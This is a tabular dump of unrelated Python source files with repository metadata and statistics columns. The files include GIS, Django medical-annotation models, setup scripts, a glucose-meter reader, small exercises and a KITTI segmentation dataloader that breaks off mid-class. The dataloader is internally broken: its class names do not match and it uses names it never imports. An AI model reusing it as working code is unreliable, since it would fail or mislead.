return command | 23.042857 | 66 | 0.49349 | 199 | 1,613 | 4 | 0.18593 | 0.020101 | 0.052764 | 0.105528 | 0.522613 | 0.404523 | 0.326633 | 0.326633 | 0.302764 | 0.302764 | 0 | 0.113095 | 0.375078 | 1,613 | 70 | 67 | 23.042857 | 0.676587 | 0 | 0 | 0.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0.010356 | 0 | 0 | 1 | 0.046154 | false | 0 | 0 | 0 | 0.092308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b89d5110511e9a326a0adf1605527ae76c9199c | 1,220 | py | Python | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 3 | 2021-07-15T15:58:52.000Z | 2021-07-16T13:22:47.000Z | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | null | null | null | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 4 | 2017-08-04T12:41:06.000Z | 2019-01-31T14:55:10.000Z | # coding:utf-8
# version:python2.7.3
# author:kyh
# import x,y data from txt and create kernel density map
import arcpy
from arcpy.sa import *
from arcpy import env
def read_point_data(filepath,i):
# Read data file and create shp file
with open(filepath, 'r') as pt_file:
pt=arcpy.Point()
ptGeoms=[]
i=0
for line in pt_file.readlines():
i=i+1
pt.X = float(line.split('\t')[7])
pt.Y = float(line.split('\t')[8])
ptGeoms.append(arcpy.PointGeometry(pt))
arcpy.CopyFeatures_management(ptGeoms, "D://Users//KYH//Documents//ArcGIS//FlickrPhoto//World_Flickr{0}.shp".format(i))
if __name__ == '__main__':
arcpy.CheckOutExtension('Spatial')
env.workspace=("D:\Users\KYH\Documents\ArcGIS\FlickrPhoto")
for i in range(0,25):
if (i==5) or (i==22):
continue
read_point_data("D:\\Users\\KYH\\Desktop\\EmotionMap\\FlickrEmotionData\\3faces_emotion\\faceflickr{0}.txt".format(i))
# Kernel Density Analysis
out_kernel_density=KernelDensity("World_Flickr{0}.shp".format(i),"NONE")
out_kernel_density.save("D:\Users\KYH\Documents\ArcGIS\FlickrPhoto\kd_Face{0}".format(i))
| 33.888889 | 127 | 0.645902 | 172 | 1,220 | 4.447674 | 0.476744 | 0.067974 | 0.047059 | 0.070588 | 0.194771 | 0.194771 | 0 | 0 | 0 | 0 | 0 | 0.019527 | 0.202459 | 1,220 | 35 | 128 | 34.857143 | 0.766701 | 0.128689 | 0 | 0 | 0 | 0 | 0.276777 | 0.236019 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.130435 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b944182e57c98d2c412133b9ff0a2ad81333fdb | 737 | py | Python | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | from setuptools import setup
setup(name='zerocater',
version='0.0.1',
description="Python interface to ZeroCater",
long_description='',
keywords='zerocater food delivery meal planning catering lunch',
author='ZeroCater',
author_email='tech@zerocater.com',
url='https://github.com/ZeroCater/PyZeroCater',
download_url='https://github.com/ZeroCater/PyZeroCater/tarball/0.0.1',
license='MIT',
packages=['zerocater'],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP",
]
) | 35.095238 | 76 | 0.63365 | 75 | 737 | 6.186667 | 0.68 | 0.008621 | 0.012931 | 0.073276 | 0.159483 | 0.159483 | 0 | 0 | 0 | 0 | 0 | 0.012281 | 0.226594 | 737 | 21 | 77 | 35.095238 | 0.801754 | 0 | 0 | 0 | 0 | 0 | 0.54065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b975c6ddf1a134fa942ba06d2fe6a39b749365f | 6,435 | py | Python | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | 2 | 2019-10-05T20:59:41.000Z | 2019-11-01T20:25:39.000Z | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | 6 | 2019-10-24T12:28:02.000Z | 2021-08-09T09:56:26.000Z | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
from django.utils import timezone
import uuid
ANNOTATION = (
('asm', 'Asymmetry'),
('dst', 'Dystonia'),
('dsk', 'Dyskensia'),
('ebt', 'En Bloc Turning'),
('str', 'Short Stride Length'),
('mov', 'Slow/Hesitant Movement'),
('pos', 'Stooped Posture'),
('trm', 'Tremor'),
('oth', 'Other/Activity')
)
FRAME_RATES = (
('NTSC_Film', 23.98),
('Film', 24),
('PAL', 25),
('NTSC', 29.97),
('Web', 30),
('PAL_HD', 50),
('NTSC_HD', 59.94),
('High', 60),
)
class PatientData(models.Model):
id = models.AutoField(primary_key=True)
first_name = models.CharField(max_length=50, help_text='Patient first name')
last_name = models.CharField(max_length=50, help_text='Patient last name')
date_of_birth = models.DateField(help_text='Patient date of birth')
notes = models.CharField(max_length=500, help_text='Notes regarding patient')
class Meta:
ordering = ['last_name']
permissions = (("can_alter_patientdata", "Can create or edit patient data entries."),)
def get_absolute_url(self):
return reverse('patientdata-detail', args=[str(self.id)])
def __str__(self):
return f'{self.last_name}, {self.first_name}'
class WearableData(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='Unique ID for this wearable data')
patient = models.ForeignKey('PatientData', on_delete=models.CASCADE, null=True, related_name='wearables')
filename = models.FileField(upload_to='wearable/', help_text='Wearable data file')
time = models.DateTimeField(help_text='Session date & time')
note = models.CharField(max_length=500, help_text='Note regarding wearable data')
class Meta:
ordering = ['patient', '-time']
permissions = (("can_alter_wearabledata", "Can create or edit wearable data entries."),)
def get_absolute_url(self):
return reverse('wearabledata-detail', args=[str(self.id)])
def __str__(self):
return f'{self.patient} ({self.time})'
class CameraData(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='Unique ID for this wearable data')
patient = models.ForeignKey('PatientData', on_delete=models.CASCADE, null=True, related_name='cameras')
filename = models.FileField(upload_to='camera/', help_text='Camera video file')
framerate = models.CharField(
max_length=9,
choices=FRAME_RATES,
default='Film',
help_text='Video framerate',
)
time = models.DateTimeField(help_text='Session date & time')
note = models.CharField(max_length=500, help_text='Note regarding camera data')
class Meta:
ordering = ['patient', '-time']
permissions = (("can_alter_cameradata", "Can create or edit camera data entries."),)
def get_absolute_url(self):
return reverse('cameradata-detail', args=[str(self.id)])
def __str__(self):
return f'{self.patient} ({self.time})'
def get_user_annotations(self):
return self.c_annotations.filter(annotator=User)
class WearableAnnotation(models.Model):
id = models.AutoField(primary_key=True)
wearable = models.ForeignKey('WearableData', on_delete=models.CASCADE, null=True, related_name='w_annotations')
frame_begin = models.PositiveIntegerField()
frame_end = models.PositiveIntegerField()
annotator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
annotation = models.CharField(
max_length=3,
choices=ANNOTATION,
default='oth',
help_text='PD Symptom',
)
note = models.CharField(max_length=500, help_text='Note regarding annotation', null=True, blank=True)
class Meta:
ordering = ['frame_begin']
permissions = (("can_alter_wearableannotation", "Can create or edit wearable annotations."),)
def get_absolute_url(self):
return reverse('wearableannotation-detail', args=[str(self.wearable.id), str(self.id)])
def __str__(self):
return f'{self.wearable} - ({self.frame_begin}-{self.frame_end}) - {self.get_annotation_display()}'
class CameraAnnotation(models.Model):
id = models.AutoField(primary_key=True)
camera = models.ForeignKey('CameraData', on_delete=models.CASCADE, null=True, related_name='c_annotations')
time_begin = models.CharField(max_length=11, help_text='hh:mm:ss:ff')
time_end = models.CharField(max_length=11, help_text='hh:mm:ss:ff')
annotator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
annotation = models.CharField(
max_length=3,
choices=ANNOTATION,
default='oth',
help_text='PD Symptom',
)
note = models.CharField(max_length=500, help_text='Note regarding annotation', null=True, blank=True)
class Meta:
ordering = ['camera', 'time_begin']
permissions = (("can_alter_cameraannotation", "Can create or edit camera annotations."),)
def get_absolute_url(self):
return reverse('cameraannotation-detail', args=[str(self.camera.id), str(self.id)])
def __str__(self):
return f'{self.camera} - ({self.time_begin}-{self.time_end}) - {self.get_annotation_display()}'
class CameraAnnotationComment(models.Model):
id = models.AutoField(primary_key=True)
annotation = models.ForeignKey('CameraAnnotation', on_delete=models.CASCADE, related_name='comments')
author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
timestamp = models.DateTimeField(default=timezone.now)
text = models.TextField()
class Meta:
ordering = ['annotation', 'timestamp']
permissions = (("can_alter_cameraannotation_comment", "Can create or edit camera annotation comments."),)
def __str__(self):
return self.text
class WearableDataPoint(models.Model):
id = models.AutoField(primary_key=True)
wearable = models.ForeignKey('WearableData', on_delete=models.CASCADE, null=True, related_name='data_point')
frame = models.PositiveIntegerField()
magnitude = models.FloatField()
class Meta:
ordering = ['frame']
permissions = (("can_alter_wearabledata_point", "Can create or edit wearable data point."),)
def __str__(self):
return f'{self.wearable.id} - ({self.frame}, {self.magnitude})'
| 37.631579 | 116 | 0.685004 | 787 | 6,435 | 5.418043 | 0.208386 | 0.035647 | 0.050657 | 0.067542 | 0.585366 | 0.550657 | 0.523921 | 0.507036 | 0.446998 | 0.37031 | 0 | 0.009445 | 0.177312 | 6,435 | 170 | 117 | 37.852941 | 0.795995 | 0 | 0 | 0.343284 | 0 | 0.014925 | 0.261849 | 0.052991 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097015 | false | 0 | 0.037313 | 0.097015 | 0.626866 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0b9809b2c18e28f3af61ecc6021ff494abd1e0f4 | 533 | py | Python | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 20 | 2021-03-16T08:18:01.000Z | 2022-03-12T13:46:43.000Z | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 1 | 2021-05-13T14:49:25.000Z | 2021-05-13T19:45:26.000Z | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 5 | 2020-11-01T15:46:39.000Z | 2021-07-30T13:12:06.000Z | from distutils.core import setup
from setuptools import find_packages
setup(
name='mopac',
packages=find_packages(),
version='0.1',
description='Model-based policy optimization',
long_description=open('./README.md').read(),
author='',
author_email='',
url='',
entry_points={
'console_scripts': (
'mopac=softlearning.scripts.console_scripts:main',
'viskit=mopac.scripts.console_scripts:main'
)
},
requires=(),
zip_safe=True,
license='MIT'
)
| 23.173913 | 62 | 0.626642 | 56 | 533 | 5.803571 | 0.696429 | 0.129231 | 0.129231 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.230769 | 533 | 22 | 63 | 24.227273 | 0.787805 | 0 | 0 | 0 | 0 | 0 | 0.292683 | 0.165103 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.095238 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b9897a43237e684b6c66f4d6a3b18dc5aaad9da | 1,217 | py | Python | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | 1 | 2020-11-28T13:23:58.000Z | 2020-11-28T13:23:58.000Z | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | null | null | null | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import user
import serial
from pprint import pprint, pformat
import insulaudit
from insulaudit.data import glucose
from insulaudit.log import io
from insulaudit.devices import onetouch2
import sys
PORT = '/dev/ttyUSB0'
def get_serial( port, timeout=2 ):
return serial.Serial( port, timeout=timeout )
def init( ):
mini = onetouch2.OneTouchUltra2( PORT, 5 )
print "is open? %s\n timeout: %s" % ( mini.serial.isOpen( ), mini.serial.getTimeout() )
print ""
print "read serial number"
serial = mini.execute( onetouch2.ReadSerial( ) )
print "serial number: %s" % serial
print ""
if serial == "":
print "could not connect"
sys.exit(1)
print ""
print "read firmware number"
firmware = mini.execute( onetouch2.ReadFirmware( ) )
print "firmware: %s" % firmware
print ""
print "RFID"
print mini.execute( onetouch2.ReadRFID( ) )
print "GLUCOSE"
data = mini.read_glucose( )
print data
print "len glucose: %s" % len( data )
head, body = data
output = open( 'sugars-debug.txt', 'w' )
output.write( glucose.format_records( body ) )
output.write( '\n' )
output.close( )
return mini
if __name__ == '__main__':
port = init()
io.info( port )
| 22.537037 | 89 | 0.67461 | 157 | 1,217 | 5.159236 | 0.414013 | 0.051852 | 0.074074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010235 | 0.197206 | 1,217 | 53 | 90 | 22.962264 | 0.818833 | 0.013147 | 0 | 0.095238 | 0 | 0 | 0.145121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.190476 | null | null | 0.380952 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b9b80c225b518a078b36396f1fbccc56916e124 | 738 | py | Python | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | import time
#Timing stuff
lastTime = None
prevFrameTime = 0;
def waitFramerate(T): #TODO if we have enough time, call the garbage collector
global lastTime, prevFrameTime
ctime = time.monotonic()
if lastTime:
frameTime = ctime-lastTime #how long the last frame took
sleepTime = T-frameTime #how much time is remaining in target framerate
if prevFrameTime > frameTime and prevFrameTime > 1.2*T:
print("Peak frame took "+str(prevFrameTime)[:5]+"/"+str(int(1.0/prevFrameTime))+" FPS (Target "+str(T)[:5]+")")
if(sleepTime <= 0): #we went overtime. set start of next frame to now, and continue
lastTime = ctime
else:
lastTime = lastTime+T
time.sleep(sleepTime)
prevFrameTime = frameTime
else:
lastTime = ctime
| 32.086957 | 114 | 0.720867 | 103 | 738 | 5.165049 | 0.543689 | 0.033835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013093 | 0.172087 | 738 | 22 | 115 | 33.545455 | 0.85761 | 0.275068 | 0 | 0.210526 | 0 | 0 | 0.058491 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0baeb09b96866048e3277bdd11b177c6f437a60e | 1,217 | py | Python | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | #--- Exercício 2 - Variáveis
#--- Crie um menu para um sistema de cadastro de funcionários
#--- O menu deve ser impresso com a função format()
#--- As opções devem ser variáveis do tipo inteiro
#--- As descrições das opções serão:
#--- Cadastrar funcionário
#--- Listar funcionários
#--- Editar funcionário
#--- Deletar funcionário
#--- Sair
#--- Além das opções o menu deve conter um cabeçalho e um rodapé
#--- Entre o cabeçalho e o menu e entre o menu e o rodapé deverá ter espaçamento de 3 linhas
#--- Deve ser utilizado os caracteres especiais de quebra de linha e de tabulação
opcao = int(input("""
SISTEMA DE CADASTRO DE FUNCIONARIO\n\n\n
{} - Cadastrar Funcionário
{} - Listar Funcinários
{} - Editar Funcionário
{} - Deletar Funcionário
{} - Sair\n\n\n
Escolha uma opção: """.format(1,2,3,4,5)))
if opcao == 1:
print("A opção escolhida foi 'Cadastrar funcionário'")
elif opcao == 2:
print("A opção escolhida foi 'Listar funcionários'")
elif opcao == 3:
print("A opção escolhida foi 'Editar funcionário'")
elif opcao == 4:
print("A opção escolhida foi 'Deletar funcionário'")
elif opcao == 5:
print("A opção escolhida foi 'Sair'")
else:
pass
| 32.891892 | 92 | 0.676253 | 171 | 1,217 | 4.812866 | 0.415205 | 0.036452 | 0.066829 | 0.121507 | 0.234508 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012435 | 0.207067 | 1,217 | 36 | 93 | 33.805556 | 0.840415 | 0.470008 | 0 | 0 | 0 | 0 | 0.638669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.05 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0bb4673a2136b7bf006e51e515e0e3d35ea020dd | 417 | py | Python | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | null | null | null | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | null | null | null | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | 1 | 2021-07-08T11:40:27.000Z | 2021-07-08T11:40:27.000Z | from hyperopt import hp
# Define the search space here, e.g.
# from hyperopt.pyll.base import scope
# search_space = {
# 'epochs': hp.qloguniform('epochs', 0, 4, 2),
# 'max_df': hp.uniform('max_df', 1, 2),
# 'max_ngrams': scope.int(hp.quniform('max_ngram', 3, 9, 1))
# }
# Default search space: Try different numbers of training epochs.
search_space = {"epochs": hp.qloguniform("epochs", 0, 4, 2)}
| 29.785714 | 65 | 0.654676 | 63 | 417 | 4.238095 | 0.555556 | 0.164794 | 0.127341 | 0.142322 | 0.292135 | 0.292135 | 0.292135 | 0.292135 | 0.292135 | 0 | 0 | 0.032164 | 0.179856 | 417 | 13 | 66 | 32.076923 | 0.748538 | 0.748201 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0bb56b74527c4ab3380dff7d3851c648cd78de0c | 347 | py | Python | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | __version__ = "2.18"
def version():
"""Returns the version number of the installed workflows package."""
return __version__
class Error(Exception):
"""Common class for exceptions deliberately raised by workflows package."""
class Disconnected(Error):
"""Indicates the connection could not be established or has been lost."""
| 23.133333 | 79 | 0.723343 | 42 | 347 | 5.785714 | 0.761905 | 0.131687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.178674 | 347 | 14 | 80 | 24.785714 | 0.842105 | 0.576369 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0bc0f8ad9a5e857c61031c1ca0a45f2bb10b8808 | 783 | py | Python | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | import sys
import json
from os import path
from argparse import ArgumentParser
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))) + '/utils/')
from algorithm_utils import set_algorithms_output_data
from health_check_lib import HealthCheckLocalDT
def main():
# Parse arguments
parser = ArgumentParser()
parser.add_argument('-local_step_dbs', required=True, help='Path to local db.')
args, unknown = parser.parse_known_args()
local_dbs = path.abspath(args.local_step_dbs)
local_out = HealthCheckLocalDT.load(local_dbs)
nodes = {}
nodes["active_nodes"] = local_out.get_data()
# Return the algorithm's output
set_algorithms_output_data(json.dumps(nodes))
if __name__ == '__main__':
main()
| 27.964286 | 84 | 0.715198 | 100 | 783 | 5.26 | 0.51 | 0.041825 | 0.057034 | 0.087452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186462 | 783 | 27 | 85 | 29 | 0.825746 | 0.057471 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e7ea14302b331a9466a14df8ced10e7042b53923 | 7,081 | py | Python | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
] | null | null | null | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
] | null | null | null | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
] | null | null | null | """Pascal VOC Semantic Segmentation Dataset."""
import os
import torch
import numpy as np
from PIL import Image
from .segbase import SegmentationDataset
class VOCSegmentation(SegmentationDataset):
"""Pascal VOC Semantic Segmentation Dataset.
Parameters
----------
root : string
Path to VOCdevkit folder. Default is './datasets/VOCdevkit'
split: string
'train', 'val' or 'test'
transform : callable, optional
A function that transforms the image
Examples
--------
>>> from torchvision import transforms
>>> import torch.utils.data as data
>>> # Transforms for Normalization
>>> input_transform = transforms.Compose([
>>> transforms.ToTensor(),
>>> transforms.Normalize([.485, .456, .406], [.229, .224, .225]),
>>> ])
>>> # Create Dataset
>>> trainset = VOCSegmentation(split='train', transform=input_transform)
>>> # Create Training Loader
>>> train_data = data.DataLoader(
>>> trainset, 4, shuffle=True,
>>> num_workers=4)
"""
BASE_DIR = 'labels'
NUM_CLASS = 1 # 1 for soft labels
def __init__(self, root='/HDD1_2TB/storage/kitti_self_supervised_labels', split='train', mode=None, transform=None,
**kwargs):
super(KITTISegmentation, self).__init__(root, split, mode, transform, **kwargs)
_voc_root = os.path.join(root, self.BASE_DIR)
_mask_dir = os.path.join(_voc_root, 'SegmentationClass')#os.path.join(_voc_root, 'JPEGImages')
_image_dir = os.path.join(_voc_root, 'JPEGImages')
_path_mask_dir = os.path.join(_voc_root, 'SoftRoadGaussianLabels')#os.path.join(_voc_root, 'JPEGImages')
# train/val/test splits are pre-cut
_splits_dir = os.path.join(_voc_root, 'ImageSets/Segmentation')
if split == 'train':
_split_f = os.path.join(_splits_dir, 'train')
elif split == 'val':
_split_f = os.path.join(_splits_dir, 'val') #'val_upb.txt'; with info has the files that are synched with the steering info files
elif split == 'test':
_split_f = os.path.join(_splits_dir, 'test')
else:
raise RuntimeError('Unknown dataset split.')
self.images = []
self.masks = []
self.path_masks = []
self.cmds = []
with open(os.path.join(_split_f), "r") as lines:
for line in lines:
file_name = line.split(',')[0]
cmd = line.split(',')[1]
_image = os.path.join(_image_dir, file_name)
assert os.path.isfile(_image)
_path_mask = os.path.join(_path_mask_dir, file_name.replace('/', '\\')) # doar filename pt eval
assert os.path.isfile(_path_mask)
self.images.append(_image)
self.path_masks.append(_path_mask)
self.cmds.append(cmd)
if split != 'test':
_mask = os.path.join(_mask_dir, file_name.replace('/', '\\')) # doar filename pt eval
assert os.path.isfile(_mask)
self.masks.append(_mask)
if split != 'test':
assert (len(self.images) == len(self.masks))
print('Found {} images in the folder {}'.format(len(self.images), _voc_root))
def __getitem__(self, index):
img = Image.open(self.images[index]).convert('RGB')
# print(self.cmds[index])
# img.show()
# time.sleep(8)
if self.mode == 'test':
img = self._img_transform(img)
if self.transform is not None:
img = self.transform(img)
return img, os.path.basename(self.images[index])
mask = Image.open(self.masks[index]).quantize(self.num_class + 1) # 1 for train or 2 for eval
path_mask = Image.open(self.path_masks[index]).convert('RGB')
# path_mask = np.load(self.path_masks[index], allow_pickle=True)
# path_mask = Image.fromarray(path_mask)
# mask.show()
# time.sleep(5)
# synchronized transform
if self.mode == 'train':
img, mask, path_mask = self._sync_transform(img, mask, path_mask)
elif self.mode == 'val':
img, mask, path_mask = self._val_sync_transform(img, mask, path_mask)
else:
assert self.mode == 'testval'
img, mask = self._img_transform(img), self._mask_transform(mask)
# general resize, normalize and toTensor
if self.transform is not None:
img = self.transform(img)
path_mask = transforms.ToTensor()(path_mask)
path_mask = path_mask[1].unsqueeze(0)
if path_mask.max() != 0:
path_mask = path_mask / path_mask.max()
return img, mask, path_mask, self.images[index]# os.path.basename(self.images[index])
def __len__(self):
return len(self.images)
def _mask_transform(self, mask):
target = np.array(mask).astype('int32')
target[target == 255] = -1
return torch.from_numpy(target).long()
@property
def classes(self):
"""Category names."""
return ('path', 'rest')
class KITTIImageSampler(Sampler):
def __init__(self, image_data, prob_weights):
self.image_data = image_data
